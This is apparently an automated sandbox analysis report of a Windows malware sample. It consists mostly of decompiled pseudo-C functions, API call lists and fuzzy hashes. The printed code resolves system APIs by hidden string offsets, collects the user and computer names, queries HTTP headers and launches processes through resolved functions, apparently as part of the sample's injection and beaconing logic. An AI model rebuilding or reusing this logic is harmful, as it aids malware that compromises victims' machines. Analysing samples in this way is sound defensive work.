          Uniqueness Score: -1.00%

          Function 005E37DF Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 109librarymemoryloaderCOMMON
          Download Yara Rule
          C-Code - Quality: 73%
          			E005E37DF(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E005E6BF9(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E005E7AB0( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x5ea300 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x5ea348; // 0x25dd5a8
					_t18 = _t47 + 0x5eb706; // 0x73797325
					_t68 = E005E127E(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x5ea348; // 0x25dd5a8
						_t19 = _t50 + 0x5eb86c; // 0x2bc8e14
						_t20 = _t50 + 0x5eb3f6; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E005E5B56();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E005E5B56();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x5ea2d8, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E005E61DA(_t70);
				goto L12;
			}


















          0x005e37e7
          0x005e37e7
          0x005e37f6
          0x005e37fd
          0x005e3802
          0x005e390f
          0x005e3916
          0x005e3916
          0x005e3811
          0x005e3819
          0x005e381c
          0x005e3821
          0x005e3836
          0x005e383c
          0x005e383d
          0x005e3840
          0x005e3846
          0x005e3849
          0x005e384e
          0x005e3856
          0x005e3862
          0x005e3866
          0x005e38f6
          0x005e386c
          0x005e386c
          0x005e3871
          0x005e3878
          0x005e388c
          0x005e3890
          0x005e38df
          0x005e3892
          0x005e3893
          0x005e389a
          0x005e38b3
          0x005e38b5
          0x005e38b9
          0x005e38c0
          0x005e38da
          0x005e38c2
          0x005e38cb
          0x005e38d0
          0x005e38d0
          0x005e38c0
          0x005e38ee
          0x005e38ee
          0x005e3866
          0x005e38fd
          0x005e3906
          0x005e390a
          0x00000000

          APIs
            • Part of subcall function 005E6BF9: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,005E37FB,?,?,?,?,00000000,00000000), ref: 005E6C1E
            • Part of subcall function 005E6BF9: GetProcAddress.KERNEL32(00000000,7243775A), ref: 005E6C40
            • Part of subcall function 005E6BF9: GetProcAddress.KERNEL32(00000000,614D775A), ref: 005E6C56
            • Part of subcall function 005E6BF9: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 005E6C6C
            • Part of subcall function 005E6BF9: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 005E6C82
            • Part of subcall function 005E6BF9: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 005E6C98
          • memset.NTDLL ref: 005E3849
            • Part of subcall function 005E127E: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,005E3862,73797325), ref: 005E128F
            • Part of subcall function 005E127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 005E12A9
          • GetModuleHandleA.KERNEL32(4E52454B,02BC8E14,73797325), ref: 005E387F
          • GetProcAddress.KERNEL32(00000000), ref: 005E3886
          • HeapFree.KERNEL32(00000000,00000000), ref: 005E38EE
            • Part of subcall function 005E5B56: GetProcAddress.KERNEL32(36776F57,005E2425), ref: 005E5B71
          • CloseHandle.KERNEL32(00000000,00000001), ref: 005E38CB
          • CloseHandle.KERNEL32(?), ref: 005E38D0
          • GetLastError.KERNEL32(00000001), ref: 005E38D4
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
          • String ID: Uqt$@MqtNqt
          • API String ID: 3075724336-3266969629
          • Opcode ID: 03d2803409345d3a120b04b83843f346f8c9b5bbd1f9feb0f9cb1af98968f5a0
          • Instruction ID: 6ddd433ade9b7f5e9353c570e33c3bd8667c74c279450689c1771caebbff71c8
          • Opcode Fuzzy Hash: 03d2803409345d3a120b04b83843f346f8c9b5bbd1f9feb0f9cb1af98968f5a0
          • Instruction Fuzzy Hash: 5E3172B1804299AFDB14AFA6CC8DD9EBFBCFB48344F004465F685A7121D7306E48DB50
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E3FA5 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 92networksynchronizationCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E3FA5(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E005E33DC(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E005E61DA(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E005E16B2( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}














          0x005e3fa5
          0x005e3fa5
          0x005e3fb5
          0x005e3fb8
          0x005e3fbc
          0x005e3fc2
          0x005e3fc7
          0x005e3fe0
          0x005e3ff4
          0x005e3ffb
          0x005e4002
          0x005e4055
          0x005e405b
          0x005e4061
          0x005e409c
          0x005e40a2
          0x00000000
          0x00000000
          0x00000000
          0x005e4061
          0x005e4008
          0x00000000
          0x005e400f
          0x005e401d
          0x005e4020
          0x005e4023
          0x005e402f
          0x005e4033
          0x005e4095
          0x005e4035
          0x005e4047
          0x005e4085
          0x005e4090
          0x005e4049
          0x005e404c
          0x005e4050
          0x005e4050
          0x005e4047
          0x00000000
          0x005e4033
          0x005e4008
          0x005e3fcc
          0x005e3fd2
          0x005e3fd5
          0x005e3fda
          0x00000000
          0x00000000
          0x00000000
          0x005e406a
          0x005e4072
          0x005e4077
          0x005e407a
          0x00000000

          APIs
          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,747581D0,00000000,00000000), ref: 005E3FBC
          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,005E3F34,00000000,?), ref: 005E3FCC
          • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 005E3FFE
          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 005E4023
          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 005E4043
          • GetLastError.KERNEL32 ref: 005E4055
            • Part of subcall function 005E16B2: WaitForMultipleObjects.KERNEL32(00000002,005E7C47,00000000,005E7C47,?,?,?,005E7C47,0000EA60), ref: 005E16CD
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          • GetLastError.KERNEL32(00000000), ref: 005E408A
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
          • String ID: @MqtNqt
          • API String ID: 3369646462-2883916605
          • Opcode ID: 419702625537160e4993d791acf4b8225561956b50ab79bf192494c6fbac6999
          • Instruction ID: ba034369e5465393af4353ad6a82e7cb9276c0bb5c1477d9d75dc7ae83b16c80
          • Opcode Fuzzy Hash: 419702625537160e4993d791acf4b8225561956b50ab79bf192494c6fbac6999
          • Instruction Fuzzy Hash: 3F3144B5D00389EFDB24DFE2C8C899EBBB8FB48300F104979E68296151D731AA48DF10
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E7238 Relevance: 13.6, APIs: 9, Instructions: 145stringCOMMON
          Download Yara Rule
          C-Code - Quality: 43%
          			E005E7238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x5ea3dc; // 0x2bc9cc0
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E005E6ABD();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E005E6ABD();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E005E42E9(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E005E42E9(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E005E398D(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x5e918c;
						}
						_t70 = E005E5FA1(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E005E33DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x5ea348; // 0x25dd5a8
								_t102 =  *0x5ea138; // 0x5e7ddd
								_t28 = _t105 + 0x5ebd10; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E005E398D(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x5e9190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E005E33DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E005E61DA(_v24);
								} else {
									_t92 =  *0x5ea348; // 0x25dd5a8
									_t44 = _t92 + 0x5eba20; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E005E61DA(_v8);
						}
						E005E61DA(_v12);
					}
					E005E61DA(_v16);
				}
				return _v28;
			}



































          0x005e723e
          0x005e7246
          0x005e7249
          0x005e7256
          0x005e7259
          0x005e7260
          0x005e7267
          0x005e726a
          0x005e7277
          0x005e727a
          0x005e727d
          0x005e7282
          0x005e7287
          0x005e728f
          0x005e7294
          0x005e7299
          0x005e729f
          0x005e72a3
          0x005e72ac
          0x005e72b0
          0x005e72b2
          0x005e72b2
          0x005e72ba
          0x005e72bf
          0x005e72c4
          0x005e72ca
          0x005e72d1
          0x005e72e2
          0x005e72e9
          0x005e72fb
          0x005e7300
          0x005e7305
          0x005e730e
          0x005e7317
          0x005e7320
          0x005e7336
          0x005e733b
          0x005e733f
          0x005e7343
          0x005e7348
          0x005e734d
          0x005e734f
          0x005e734f
          0x005e7359
          0x005e7362
          0x005e7369
          0x005e7385
          0x005e7389
          0x005e73c2
          0x005e738b
          0x005e738e
          0x005e7396
          0x005e73a7
          0x005e73af
          0x005e73b7
          0x005e73bb
          0x005e73bb
          0x005e7389
          0x005e73ca
          0x005e73ca
          0x005e73d2
          0x005e73d2
          0x005e73da
          0x005e73da
          0x005e73e6

          APIs
          • GetTickCount.KERNEL32 ref: 005E7250
          • lstrlen.KERNEL32(00000000,00000005), ref: 005E72D1
          • lstrlen.KERNEL32(?), ref: 005E72E2
          • lstrlen.KERNEL32(00000000), ref: 005E72E9
          • lstrlenW.KERNEL32(80000002), ref: 005E72F0
          • lstrlen.KERNEL32(?,00000004), ref: 005E7359
          • lstrlen.KERNEL32(?), ref: 005E7362
          • lstrlen.KERNEL32(?), ref: 005E7369
          • lstrlenW.KERNEL32(?), ref: 005E7370
            • Part of subcall function 005E61DA: RtlFreeHeap.NTDLL(00000000,00000000,005E6383,00000000,?,00000000,00000000), ref: 005E61E6
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: lstrlen$CountFreeHeapTick
          • String ID:
          • API String ID: 2535036572-0
          • Opcode ID: cec8693603dfa982ebb3e04c30011b561d76fcc73e022306c47585afee5978c3
          • Instruction ID: 6a2835543c14803ba3ff6ed737296278cb4d242943f5cfc825a5eda2ef41cd57
          • Opcode Fuzzy Hash: cec8693603dfa982ebb3e04c30011b561d76fcc73e022306c47585afee5978c3
          • Instruction Fuzzy Hash: 4C51B072D0025AABCF1AAFA6CC499DE7FB1FF48354F054024F944AB211DB31CA14EBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E1340 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E1340() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x775ec742
						_v12 = _v12 + _t11;
						_t64 = E005E33DC(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E005E61DA(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x5e3e01
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















          0x005e134e
          0x005e1351
          0x005e1354
          0x005e135a
          0x005e135f
          0x005e1365
          0x005e136d
          0x005e1370
          0x005e1376
          0x005e137b
          0x005e1384
          0x005e1388
          0x005e1395
          0x005e1399
          0x005e139b
          0x005e139f
          0x005e13a2
          0x005e13b2
          0x005e1405
          0x005e1406
          0x005e13b4
          0x005e13b9
          0x005e13ba
          0x005e13bf
          0x005e13c2
          0x005e13d5
          0x00000000
          0x005e13d7
          0x005e13da
          0x005e13df
          0x005e13ed
          0x005e13f0
          0x005e13f6
          0x005e13fb
          0x00000000
          0x005e13fd
          0x005e13fd
          0x005e1400
          0x005e1400
          0x005e13fb
          0x005e13d5
          0x005e140b
          0x005e140c
          0x005e137b
          0x005e1412

          APIs
          • GetUserNameW.ADVAPI32(00000000,005E3DFF), ref: 005E1354
          • GetComputerNameW.KERNEL32(00000000,005E3DFF), ref: 005E1370
            • Part of subcall function 005E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,005E62F6), ref: 005E33E8
          • GetUserNameW.ADVAPI32(00000000,005E3DFF), ref: 005E13AA
          • GetComputerNameW.KERNEL32(005E3DFF,775EC740), ref: 005E13CD
          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,005E3DFF,00000000,005E3E01,00000000,00000000,?,775EC740,005E3DFF), ref: 005E13F0
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
          • String ID: @hqt
          • API String ID: 3850880919-2648236075
          • Opcode ID: bcc20651b123fff1ef75ac1805a90293401c104b838274f8afb418753ff9e5ff
          • Instruction ID: 609b3853b451ca81f4c5e33b5d642d3ce4ee56ab41f58c03c52af7e52a964c25
          • Opcode Fuzzy Hash: bcc20651b123fff1ef75ac1805a90293401c104b838274f8afb418753ff9e5ff
          • Instruction Fuzzy Hash: D221F8B6900148FFCB15DFE6C9888EEBBB8FF44300B5044AAE541E7240DB30AB45DB55
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E54D8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E54D8(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x5ea30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x5ea2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x5ea2f8 = _t6;
					 *0x5ea304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x5ea2f4 = _t7;
					if(_t7 == 0) {
						 *0x5ea2f4 =  *0x5ea2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









          0x005e54e0
          0x005e54e6
          0x005e54ed
          0x00000000
          0x005e5547
          0x005e54ef
          0x005e54f7
          0x005e5504
          0x005e5504
          0x005e5544
          0x00000000
          0x005e5544
          0x005e5506
          0x005e5506
          0x005e550b
          0x005e551d
          0x005e5522
          0x005e5528
          0x005e552e
          0x005e5535
          0x005e5537
          0x005e5537
          0x00000000
          0x005e553e
          0x005e5500
          0x00000000
          0x00000000
          0x005e5502
          0x00000000

          APIs
          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,005E5037,?), ref: 005E54E0
          • GetVersion.KERNEL32 ref: 005E54EF
          • GetCurrentProcessId.KERNEL32 ref: 005E550B
          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 005E5528
          • GetLastError.KERNEL32 ref: 005E5547
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
          • String ID: @MqtNqt
          • API String ID: 2270775618-2883916605
          • Opcode ID: d1edae39775a652a05b546f2fad1c1d981fde70a7db3b0aaf2aa6369b4eadd20
          • Instruction ID: b0d0995831089964702133a2878fb90af46407304ca6392be4fb84846dff4f75
          • Opcode Fuzzy Hash: d1edae39775a652a05b546f2fad1c1d981fde70a7db3b0aaf2aa6369b4eadd20
          • Instruction Fuzzy Hash: E5F0A4B45407C29BD72C8F31AC99B143F63B724755F50081AE6D3DE1E0F6709488EB16
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E3A63 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
          Download Yara Rule
          APIs
          • SysAllocString.OLEAUT32(00000000), ref: 005E3ABD
          • SysAllocString.OLEAUT32(0070006F), ref: 005E3AD1
          • SysAllocString.OLEAUT32(00000000), ref: 005E3AE3
          • SysFreeString.OLEAUT32(00000000), ref: 005E3B4B
          • SysFreeString.OLEAUT32(00000000), ref: 005E3B5A
          • SysFreeString.OLEAUT32(00000000), ref: 005E3B65
          Memory Dump Source
          • Source File: 00000000.00000002.580662493.00000000005E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 005E0000, based on PE: true
          • Associated: 00000000.00000002.580658299.00000000005E0000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580668636.00000000005E9000.00000002.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580672954.00000000005EA000.00000004.10000000.00040000.00000000.sdmpDownload File
          • Associated: 00000000.00000002.580678713.00000000005EC000.00000002.10000000.00040000.00000000.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_5e0000_server_(3).jbxd
          Similarity
          • API ID: String$AllocFree
          • String ID:
          • API String ID: 344208780-0
          • Opcode ID: da7197af15f27d93cc90dd169e06c86201baeee54c4a68c0f40b0183170d6815
          • Instruction ID: ee4e6a3dbf1933170c63b4a9e8e18dbc717e47ba63025bc9a564a41fa26965b1
          • Opcode Fuzzy Hash: da7197af15f27d93cc90dd169e06c86201baeee54c4a68c0f40b0183170d6815
          • Instruction Fuzzy Hash: EF419F36D00649ABDF05DFBDC848A9EBBBAFF89300F104466E951EB120DA71DE05CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 005E6BF9 Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E005E6BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E005E33DC(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x5ea348; // 0x25dd5a8
					_t1 = _t23 + 0x5eb436; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x5ea348; // 0x25dd5a8
					_t2 = _t26 + 0x5eb85c; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E005E61DA(_t54);
					} else {
						_t30 =  *0x5ea348; // 0x25dd5a8
						_t5 = _t30 + 0x5eb849; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x5ea348; // 0x25dd5a8
							_t7 = _t33 + 0x5eb72b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x5ea348; // 0x25dd5a8
								_t9 = _t36 + 0x5eb883; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x5ea348; // 0x25dd5a8
									_t11 = _t39 + 0x5eb87b; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E005E7A08(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















          0x005e6c08
          0x005e6c0c
          0x005e6cce
          0x005e6c12
          0x005e6c12
          0x005e6c17
          0x005e6c2a
          0x005e6c2c
          0x005e6c31
          0x005e6c39
          0x005e6c40
          0x005e6c42
          0x005e6c47
          0x005e6cc6
          0x005e6cc7
          0x005e6c49
          0x005e6c49
          0x005e6c4e
          0x005e6c56
          0x005e6c58
          0x005e6c5d
          0x00000000
          0x005e6c5f
          0x005e6c5f
          0x005e6c64
          0x005e6c6c
          0x005e6c6e
          0x005e6c73
          0x00000000
          0x005e6c75
          0x005e6c75
          0x005e6c7a
          0x005e6c82
          0x005e6c84
          0x005e6c89
          0x00000000
          0x005e6c8b
          0x005e6c8b
          0x005e6c90
          0x005e6c98
          0x005e6c9a
          0x005e6c9f
          0x00000000
          0x005e6ca1
          0x005e6ca7
          0x005e6cac
          0x005e6cb3
          0x005e6cb8
          0x005e6cbd
          0x00000000
          0x005e6cbf
          0x005e6cc2
          0x005e6cc2
          0x005e6cbd
          0x005e6c9f
          0x005e6c89
          0x005e6c73
          0x005e6c5d
          0x005e6c47
          0x005e6cdc

          APIs
